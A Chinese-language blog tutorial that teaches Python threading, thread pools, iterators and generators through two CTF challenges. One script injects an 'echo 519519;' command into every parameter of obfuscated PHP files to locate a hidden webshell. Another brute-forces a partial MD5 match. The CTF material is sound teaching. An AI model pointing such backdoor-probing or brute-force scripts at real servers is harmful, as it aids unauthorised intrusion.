Python编程—多线程与迭代器

简单的编程练习。

背景知识

用简单的例子快速了解Python的多线程以及迭代器

多线程

下面是一个简单的多线程的例子:

import threading

def print_numbers():
    for i in range(10):
        print(i)

def print_letters():
    for letter in "abcdefghijklmnopqrstuvwxyz":
        print(letter)

thread1 = threading.Thread(target=print_numbers)
thread2 = threading.Thread(target=print_letters)

thread1.start()
thread2.start()

thread1.join()
thread2.join()

上述代码做了以下几件事:

  • 定义了两个函数,一个打印0到9的数字,另一个打印字母a到z。
  • 创建了两个线程,分别将两个函数作为目标(target)。
  • 通过start()将设置线程为“启动”状态,并且Python解释器将安排其执行。
  • join()方法用于等待一个特定的线程完成。当你在主线程中调用thread1.join()时,主线程将暂停执行,直到thread1完成。然后,你调用thread2.join(),主线程再次暂停,等待thread2完成。

迭代器

下面是一个简单的迭代器例子:

class Counter:
    def __init__(self, low, high):
        self.current = low
        self.high = high

    def __iter__(self):
        # 返回迭代器对象本身
        return self

    def __next__(self):
        # 返回容器的下一个值
        if self.current > self.high:
            raise StopIteration
        else:
            self.current += 1
            return self.current - 1

counter = Counter(0, 5)
for number in counter:
    print(number)

在Python中,迭代器是一个实现了迭代器协议(包含__iter__()__next__()方法)的对象。

其中,__iter__()方法返回迭代器对象本身,然后在迭代的时候,每一次都会通过迭代器对象的__next__()方法给出一个值。

当容器中没有更多的元素时,__next__()方法应该抛出StopIteration异常。Python会自动捕获这个异常,并停止迭代。

接下来通过两道题目加深这两部分的理解。

[强网杯 2019]高明的黑客

下载源码www.tar.gz

源码里是一些混淆过的php文件,黑客留下的shell就在其中。

对于一个文件,可以将其中所有GET和POST请求的参数提取出来,再把这些参数赋上命令(如echo 519519;)去请求。验证返回页面的内容,最后找到这个shell的参数。

下面是一个简单的搜索脚本:

import os
import re
import requests
import threading
import concurrent.futures
import itertools
import time


def find_backdoor_iteration(filename):
    with open(path + filename) as f:
        php_code = f.read()

    pattern = r"\$_(GET|POST)\['(\w+)'\]"
    matches = re.findall(pattern, php_code)
    parameters = {'GET': [], 'POST': []}
    for match in matches:
        param_type = match[0]
        param_name = match[1]
        parameters[param_type].append(param_name)

    params = {key: command for key in parameters['GET']}
    data = {key: command for key in parameters['POST']}
    resp = requests.post(url+filename, params=params, data=data)

    if '519519' in resp.text:
        print('Find backdoor: '+filename)
        # 寻找正确的参数
        method = ''
        resp = requests.get(url + filename, params=params)
        if '519519' in resp.text:
            print('Backdoor in GET!!!')
            method = 'GET'
        resp = requests.post(url + filename, data=data)
        if '519519' in resp.text:
            print('Backdoor in POST!!!')
            method = 'POST'

        keys = parameters[method]
        for key in keys:
            message = {key: command}
            resp = requests.get(url + filename, params=message) if method == 'GET' else requests.post(url + filename, data=message)
            if '519519' in resp.text:
                print('Backdoor is ' + key)
                return True
    return False


query = 'buu/smartHacker/'
path = '/Applications/MAMP/htdocs/' + query     # 保存文件的路径
fileList = os.scandir(path)
command = "echo 519519;"
url = 'http://localhost:8888/' + query      # 请求的URL

for file in fileList:
    filename = file.name
    if find_backdoor_iteration(filename):
        break

实现搜索后门的函数find_backdoor_iteration实现逻辑如下:

  • 接受一个文件名作为参数。
  • 读取这个文件的内容。
  • 将其中的GET和POST参数名称通过正则表达式匹配出来,按请求的方式存到一个字典中。
  • 将所有参数用我们的命令赋值并请求网页,验证是否存在后门。
  • 如果存在后门,则继续验证存在后门的参数是哪一个。
  • 对GET和POST的参数分别验证,找到最后的后门。

Ps.

  • 这里留的后门是system的,在一开始不知道是eval还是system的情况下,用echo 519519;验证,这两种情况均可找到后门。
  • requests.get(url, params=params)使用params=params传递get请求的参数,会自动进行url编码。如果自己对payload进行url编码的话,就会导致二次编码,进而无法验证。

最后我们会找到存在后门的页面是xk0SzyKwfzw.php,参数为GET请求的Efa5BVG

整个搜索的文件数量为3000,讲道理这个量不是很大,用迭代做也行了。不过用多线程还可以做得更好。

下面来考虑用多线程对这一过程加速,这是我一开始想到的方案:

tl = []
for file in fileList:
    filename = file.name
    t = threading.Thread(target=find_backdoor, args=(filename,))
    tl.append(t)
    t.start()
for t in tl:
    t.join()

非常的粗暴,没有控制线程的数量,这可能会消耗很多资源。为了解决这个问题,我们引入线程池的方法。

下面是用线程池对原方案的改进:

import concurrent.futures

with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(find_backdoor_iteration, (file.name for file in fileList))

在这个代码中,with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:这行代码创建了一个包含10个线程的线程池。

然后,executor.map(find_backdoor_iteration, (file.name for file in fileList))这行代码将find_backdoor_iteration函数应用到由(file.name for file in fileList)这个生成器表达式生成的每个元素。

map函数会自动将任务分配给线程池中的线程,如果线程池已经满了,那么新的任务就会等待,直到有线程空闲。

with语句保证了当所有任务都完成后,线程池会被正确地关闭,所有的资源都会被正确地回收。这比手动创建和回收线程要简单得多。

接下来还有一个问题,这个搜索过程会将这3000个文件全部遍历,而我希望它在找到后门后可以让程序直接停止。

解决的方案是使用一个全局的Event对象来对进程进行控制,当调用Event.set()时,Event.is_set()会返回True,当调用Event.clear()时,Event.is_set()会返回False。下面对原来的函数进行修改:

import concurrent.futures
import threading

def find_backdoor_thread(filename):
    if stop_event.is_set():
        return
    # 搜索代码......
    if filename == 'backdoor':
        stop_event.set()

stop_event = threading.Event()
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(find_backdoor_thread, (file.name for file in fileList))

下面对比两种搜索方式所耗的时间:

print('+---开始迭代搜索---+')
start_time = time.time()
for file in fileList:
    filename = file.name
    if find_backdoor_iteration(filename):
        break
end_time = time.time()
print('迭代搜索的运行时间:', end_time - start_time, '秒')

stop_event = threading.Event()
fileList = os.scandir(path)
print('+---开始多线程搜索---+')
start_time = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(find_backdoor_thread, (file.name for file in fileList))
end_time = time.time()
print('多线程搜索的运行时间:', end_time - start_time, '秒')

可以看到使用多线程效率的提升还是非常显著的~

[BJDCTF2020]EasySearch

源码在index.php.swp

这里关注一下如何找到这样的password,使其md5后前6个字符为6d0bc1

思路很简单:

  • 写一个函数generateString(),用于生成指定字符集charset中所有长度为length的字符串的组合。
  • 写一个函数md5()用于计算字符串的md5值。
  • 匹配出前缀符合要求的字符串。
import hashlib


def generateString(charset, c, l):
    if l == 0:
        strList.append(c)
        return c
    else:
        for char in charset:
            generateString(charset, char + c, l - 1)


def md5(string):
    md5_hash = hashlib.md5()
    md5_hash.update(string.encode('utf-8'))
    md5_value = md5_hash.hexdigest()

    return md5_value


charset = '0123456789'
length = 7
strList = []
generateString(charset, '', length)
for s in strList:
    if md5(s).startswith('6d0bc1'):
        print('Find it: '+s)

同样,这个方法可以找到想要的字符串,但还可以做得更好。

这里存在的一个问题是“在字符集过大或者长度需要更长的情况下,strList会变得非常重,存储这个列表会消耗很多内存,设置会有超出存储长度的情况出现。

为了解决这样的问题,我们希望每一次生成的字符串只在需要的时候才开始计算,不用开始就全部计算存储好。这里我们引入迭代器,迭代器可以实现惰性求值(lazy evaluation),即只在真正需要计算元素的值时才计算。

那么怎么把我们的递归函数引入到一个生成器中呢?像下面这样?

class Counter:
    def __init__(self, charset, length):
        self.charset = charset
        self.length = length

    def __iter__(self):
        return self

    def __next__(self):
        generateString(self.charset, '', self.length)
        raise StopIteration

显然是不行的,generateString不会每一次返回一个字符串出来,而且它内部的迭代状态也不会被迭代器保存。仔细思考后就会发现,将函数直接放到迭代器这种方法是行不通的。

这时我们引入Python生成器,生成器是Python中一种特殊的迭代器,只要一个函数有yield它就是一个生成器。当一次迭代执行到yield时候就会暂停返回yield后面的结果,然后下一次迭代的时候又从上一次yield暂停的地方继续运行。

下面我们用生成器实现上面的效果:

class CombinationGenerator:
    def __init__(self, charset, length):
        self.charset = charset
        self.length = length

    def __iter__(self):     # 用__iter__返回一个生成器。
        return self.generateString(self.charset, '', self.length)

    def generateString(self, charset, c, l):
        if l == 0:
            yield c
        else:
            for char in charset:
                yield from self.generateString(charset, c + char, l - 1)

注意这里使用了yield from在生成器中更方便地处理嵌套的迭代。yield from <expression>的表达式部分必须是另一个可迭代对象,yield from会从这个迭代对象中获取值,并在每次迭代时yield这些值,这里yield from也起到一个递归调用的效果。

下面是最后的代码:

import hashlib
import concurrent.futures


class CombinationGenerator:
    def __init__(self, charset, length):
        self.charset = charset
        self.length = length

    def __iter__(self):
        return self.generateString(self.charset, '', self.length)

    def generateString(self, charset, c, l):
        if l == 0:
            yield c
        else:
            for char in charset:
                yield from self.generateString(charset, c + char, l - 1)


def md5(string):
    md5_hash = hashlib.md5()
    md5_hash.update(string.encode('utf-8'))
    md5_value = md5_hash.hexdigest()

    return md5_value


if __name__ == '__main__':
    combination_generator = CombinationGenerator('qwertyuiopasdfghjklzxcvbnm', 6)
    
    for combination in combination_generator:
        result = md5(combination)
        if result.startswith('6d0bc1'):
            print('Find it: ' + combination)

同样combination_generator返回的是一个可迭代对象,这也方便我们使用到多线程中。我们可以像下面使用多线程来加速这一搜索过程.....吗?

def ezSearch(string):
    # print('Test: ' + string)
    result = md5(string)
    if result.startswith('6d0bc1'):
        print('Find it: ' + string, flush=True)

if __name__ == '__main__':
    combination_generator = CombinationGenerator('qwertyuiopasdfghjklzxcvbnm', 6)

    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        executor.map(ezSearch, combination_generator)

经过测试后,我们发现这里使用多线程不但没有加速搜索,反而让时间变长了。这是由于Python的全局解释器锁(Global Interpreter Lock, GIL)造成的。

在Python中,全局解释器锁是一种机制,用于同步多线程的执行,保证同一时间只有一个线程在执行。这种设计主要是为了防止多线程并发操作导致的数据不一致问题。但是,全局解释器锁也限制了Python的多线程并发性能:在CPU密集型任务中,Python的多线程甚至可能比单线程更慢。

但是,在IO密集型任务中,例如文件读写、网络请求等,Python的多线程仍然可以带来显著的性能提升,因为这些任务的大部分时间都在等待IO操作,而非CPU计算。在等待IO的过程中,其他线程可以得到执行。

所以,如果在做的是CPU密集型任务,例如计算MD5哈希,可能会发现多线程并没有带来性能提升,甚至变慢。在这种情况下,可以尝试使用多进程(例如使用multiprocessing模块),或者使用其他可以避开GIL限制的方法,例如使用Jython或者PyPy这样的Python实现,或者使用Cython这样的工具将关键代码编译为C代码。(ChatGPT🐂)

下面在字符集数字,长度为7的情况下,我们比较一下这三种方法(迭代、多线程、多进程)所耗的时间:

if __name__ == '__main__':
    combination_generator = CombinationGenerator('0123456789', 7)
    print('+---开始迭代搜索---+')
    start_time = time.time()
    for combination in combination_generator:
        result = md5(combination)
        if result.startswith('6d0bc1'):
            print('Find it: ' + combination)
    end_time = time.time()
    print('迭代搜索时间:', end_time - start_time, '秒')

    combination_generator = CombinationGenerator('0123456789', 7)
    print('+---开始多线程搜索---+')
    start_time = time.time()
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        executor.map(ezSearch, combination_generator)
    end_time = time.time()
    print('多线程搜索的时间:', end_time - start_time, '秒')

    combination_generator = CombinationGenerator('0123456789', 7)
    print('+---开始多进程搜索---+')
    start_time = time.time()
    with multiprocessing.Pool(processes=10) as pool:
        pool.map(ezSearch, combination_generator)
    end_time = time.time()
    print('多进程搜索的时间:', end_time - start_time, '秒')

总结